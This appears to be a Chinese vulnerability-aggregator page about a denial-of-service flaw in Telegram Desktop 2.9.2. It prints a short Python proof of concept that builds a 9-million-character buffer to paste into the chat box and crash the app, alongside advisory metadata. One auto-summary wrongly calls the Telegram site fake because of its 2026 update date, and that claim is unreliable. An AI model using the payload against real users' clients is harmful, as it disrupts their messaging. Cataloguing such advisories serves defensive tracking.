# Telegram Desktop 2.9.2 DoS 漏洞
N/A
是否为 Web 类漏洞: 未知
判断理由:
| # | POC 描述 | 源链接 | 神龙链接 |
|---|
标题: Telegram Desktop 2.9.2 - Denial of Service (PoC) - Windows dos Exploit -- 🔗来源链接
标签:exploit
神龙速读:
### 漏洞关键信息
- **漏洞标题**: Telegram Desktop 2.9.2 - Denial of Service (PoC)
- **EDB-ID**: 50247
- **CVE**: N/A
- **作者**:ARYAN CHEHREGHANI
- **类型**: DOS
- **平台**: WINDOWS
- **日期**: 2021-09-01
- **漏洞应用**: Telegram Desktop
- **测试版本**: 2.9.2 x64
- **测试操作系统**: Windows 10 Enterprise
### 漏洞描述
Telegram是一款注重速度和安全的通讯应用,具有全球5亿多用户。此漏洞为针对Telegram Desktop 2.9.2版本的拒绝服务攻击,可导致服务中断。
### 漏洞代码
```python
#!/usr/bin/env python
buffer = "\x41" * 9000000
try:
f = open("output.txt", "w")
print("[!] Creating %s bytes DOS payload..." % len(buffer))
f.write(buffer)
f.close()
print("[!] File Created !")
except:
print("File cannot be created")
```
### 其他信息
- **供应商主页**: [https://telegram.org](https://telegram.org)
- **软件下载链接**: [https://telegram.org/dl/desktop/win64](https://telegram.org/dl/desktop/win64)
- **漏洞发布者/来源**: [Link](Link)
标题: Telegram Messenger -- 🔗来源链接
标签:product
神龙速读:
### 关键漏洞信息
- **最新更新内容**:2026年1月3日的更新引入了AI摘要功能和新的设计,这些可能涉及AI相关的新漏洞风险。
- **操作系统覆盖范围**:Telegram支持多种操作系统和设备(Android, iPhone/iPad, PC/Linux, macOS),说明其广泛的用户基础,可能带来更多潜在的跨平台漏洞。
- **图片显示了该截图可能为伪造**:现实中 Telegram 不可能在 2025/2026 年更新,故显示网站可疑。
标题: Telegram Desktop 2.9.2 - Denial of Service | Advisories | VulnCheck -- 🔗来源链接
标签:third-party-advisory
神龙速读:
## 关键信息
- **漏洞名称**: Telegram Desktop 2.9.2 - Denial of Service
- **严重程度**: Medium
- **日期**: January 15, 2026
- **影响软件**: Telegram Desktop 2.9.2
- **CVE编号**: CVE-2021-47793
- **CVSS评分**: 4.0
- **CVSS向量**: AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N
- **相关链接**:
- [ExploitDB-50247](#)
- [官方Telegram主页](#)
- **报告人**: Aryan Chehreghani
- **描述**: Telegram Desktop 2.9.2包含一个拒绝服务漏洞,允许攻击者通过发送超大消息负载来使应用程序崩溃。攻击者可以生成一个9兆字节的缓冲区并将其粘贴到消息界面以触发应用程序崩溃。
暂无评论